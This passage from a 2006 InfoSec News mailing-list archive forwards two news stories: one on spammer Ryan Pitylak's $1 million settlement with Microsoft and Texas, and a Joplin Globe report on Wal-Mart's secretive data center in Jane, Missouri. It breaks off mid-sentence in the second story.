Subject: [ISN] Spammer settles suit for $1 million
Message-ID:

http://news.com.com/2100-7348_3-6079868.html

By Will Sturgeon
Special to CNET News.com
June 5, 2006

A major spammer who was accused of sending up to 25 million e-mails per day has settled a lawsuit with Microsoft and the state of Texas. The settlement has cost Ryan Pitylak $1 million, as well as the seizure of many of the assets he accumulated during a short-lived career as one of the world's worst spammers. At the peak of his spamming activity, the 24-year-old Texas resident was listed as the world's fourth most-prolific spammer by antispam group Spamhaus.

Now Pitylak is claiming something of an epiphany, saying he has seen the error of his ways and will dedicate his efforts to trying to rid the world of nuisance e-mail. He has even taken to referring to himself as an "antispam activist" in an apparent change of heart of epic proportions.

On Saturday, Pitylak wrote in his blog: "Over time I have come to see how I was wrong to think of spam as just a game of cat and mouse with corporate e-mail administrators. I now understand why so much effort is put into stopping it. The settlements with Microsoft and the Attorney General's Office have been a serious reality check: harsh but good, and in the public's best interest."

He added: "I am pleased to announce that I am now a part of the anti-spam community, having started an Internet security company that offers my clients advice on systems to protect against spam. I'm now working earnestly to help other entrepreneurs avoid the traps that deceived me and led me to make questionable business choices."

Will Sturgeon of Silicon.com reported from London.
From isn at c4i.org Tue Jun 6 06:03:03 2006
From: isn at c4i.org (InfoSec News)
Date: Tue, 6 Jun 2006 05:03:03 -0500 (CDT)
Subject: [ISN] Wal-Mart's data center remains mystery
Message-ID:

http://www.joplinglobe.com/local/local_story_148015054/

By Max McCoy
The Joplin Globe
Globe Investigative Writer
May 28, 2006

JANE, Mo. - Call it Area 71.

Behind a fence topped with razor wire just off U.S. Highway 71 is a bunker of a building that Wal-Mart considers so secret that it won't even let the county assessor inside without a nondisclosure agreement. The 125,000-square-foot building, tucked behind a new Wal-Mart Supercenter, is only a stone's throw from the Arkansas line and about 15 miles from corporate headquarters in Bentonville, Ark. There is nothing about the building to give even a hint that Wal-Mart owns it.

Despite the glimpses through the fence of manicured grass and carefully placed trees, the overall impression is that this is a secure site that could withstand just about anything. Earth is packed against the sides. The green roof - meant, perhaps, to blend into the surrounding Ozarks hills - bristles with dish antennas. On one of the heavy steel gates at the guardhouse is a notice that visitors must use the intercom for assistance.

What the building houses is a mystery.

Speculation

Wal-Mart's ability to crunch numbers is a favorite of conspiracy theorists, and its data centers are the corporate counterpart to Area 51 at Groom Lake in the state of Nevada. According to one consumer activist, Katherine Albrecht, even the wildest conspiracy buff might be surprised at just how much Wal-Mart knows about its customers - and how much more it would like to know.

"We were contacted about two years ago by somebody who runs a security company that had been asked in a request for proposals for ways they could link video footage with customers paying for their purchases," Albrecht said.
"Wal-Mart would actually be able to view photos and video of customers paying, say, for a pack of gum. At the time, it struck me as unbelievably outlandish because of the amount of data storage required."

But Wal-Mart, according to a 2004 New York Times article, had enough storage capacity to contain twice the amount of all the information available on the Internet. For the technically minded, the exact figure was 460 terabytes of data. The prefix tera comes from the Greek word for monster; a terabyte is a trillion bytes, the byte being the basic unit of computer storage.

Albrecht, founder of Consumers Against Supermarket Privacy Invasion and Numbering, said she never could confirm the contractor's story. That is not surprising, since Wal-Mart seldom comments on its data capabilities and operations.

A Globe request for information about the Jane data center was referred at Wal-Mart headquarters to Carrie Thum, a senior information officer and former lobbyist for the retailer. "This is not something that we discuss publicly," Thum said. "We have no comment. And that's off the record."

Skeleton crew

The Jane data center is an enigmatic icon to the power of data, which has helped Wal-Mart become the largest retailer in the world, and to the corporation's growing secrecy since founder Sam Walton's death in 1992.

When Wal-Mart constructed its primary data center at corporate headquarters in 1989, it wasn't much of a secret: It was the largest poured concrete structure in Arkansas at the time, and Walton himself ordered a third story.

"Not only had we completely designed it, we were under construction," said Bill Ferguson, a founder of Askew Nixon Ferguson Architects in Memphis, Tenn.
"They were pouring foundations, and Sam walked across the parking lot one Friday at the end of the day and said, 'You know, let's add a third floor and put some people up there.'"

Ferguson said the Bentonville data center is built on bedrock and is designed to withstand most natural and man-made disasters, but is not impregnable. The biggest danger, he said, is the area's frequently violent thunderstorms.

"We studied making it tornado-proof, which is difficult," he said. "We calculated the probability of a category 5 tornado hitting it, which was less likely than an airplane crashing into it head-on. At the time, they decided not to."

Since then, Ferguson said, changes have been made to increase the integrity of the structure. The data center was designed with backup generators, fuel on site, and room and board for a skeleton crew in the event an emergency required an extended stay.

Ferguson said his firm learned to design data centers by working with FedEx, which also is based in Memphis, and that the 1989 Wal-Mart data center was built so that it could communicate via any means available - including copper wire, fiber optics and satellites.

The firm no longer works with Wal-Mart, and Ferguson said he had no knowledge of the design or purpose of the data center in Jane. But he suggested that Jim Liles, a Memphis engineer, might know. Liles said he was a consultant on the Jane project, and that Crossland Construction was the contractor, but he was reluctant to say much else. "As far as what its purpose is, all that has to come from Wal-Mart," Liles said.

Crossland Construction, based in Columbus, Kan., said Tim Oelke of the company's Rogers, Ark., office had been in charge. Oelke did not return a phone call seeking comment.

'Never saw a plan'

The data center was completed in 2004 and was part of a project that included the Supercenter, which opened early last year, and a warehouse.
The resulting economic impact on McDonald County, known for its rolling hills and lazy rivers, is hard to overstate, said Rusty Enlow.

"Just a few years ago, one new store would have been a big deal," Enlow said. "And I'm not talking about a Supercenter. Just a gas station would have generated excitement."

Now, Enlow said, the county's tax base has doubled, and land is going for about $2,100 an acre, about twice what it was before the project was announced in 2001.

Enlow is chairman of the county planning commission, a body created by popular vote in 1964 but which had not met until this month. Enlow said he doesn't know why the commission never met, but he believes it was because whatever problem prompted its creation was solved before the board was appointed. He also said he's not sure the planning commission has any real authority, or would want any (there is no zoning in the county), but that he and the other 18 members are eager to bring even more business into the county.

"It seems with the opening of that store there has just been a lot of activity," he said. "McDonald County has always been a poor county, but we are in an excellent position now. We're a friendly place, and we're open to things."

Wal-Mart, Enlow said, had created a business synergy that was helping the county of 22,000 shed its hillbilly stereotype.

Enlow was director of the McDonald County Economic Development Council when Wal-Mart quietly began scouting for land. Only after the land had been bought south of the then-unincorporated community of Jane was it announced that the project was Wal-Mart's, and even then, plans for the data center were closely held.

"I never even saw a plan on it," Enlow said.

But Enlow said he watched during the construction of the data center, and that it appeared to be a single-story building that was built "like a bunker," with mounds of earth piled against the sides.
He later was told that it would employ 15 to 20 people, and that the building was for data storage.

To facilitate the project, the Missouri Department of Transportation agreed to widen Highway 71 to four lanes from Jane to the Arkansas line; a grant was used to expand the public water district; and the Army Corps of Engineers approved a request to fill in a small portion of wetland along Bear Hollow Road. Meanwhile, the village of Jane incorporated.

In April 2005, Wal-Mart used the 160,000-square-foot Supercenter to demonstrate its micro-merchandising capabilities as part of a media conference. Employees demonstrated hand-held Telxon (pronounced Tel-zon) computers, which resemble hand scanners but hold a year's worth of a particular store's sales history on every item. The devices help store managers decide what to stock. Bananas are Wal-Mart's best-selling produce product nationwide, but at Jane, the top seller was lettuce, Supermarket News reported after the event.

'Secretive'

Bill Wilson, McDonald County presiding commissioner, said he has never been inside the green-roofed data center, and that to his knowledge, only one county official has: Assessor Laura Pope.

"I had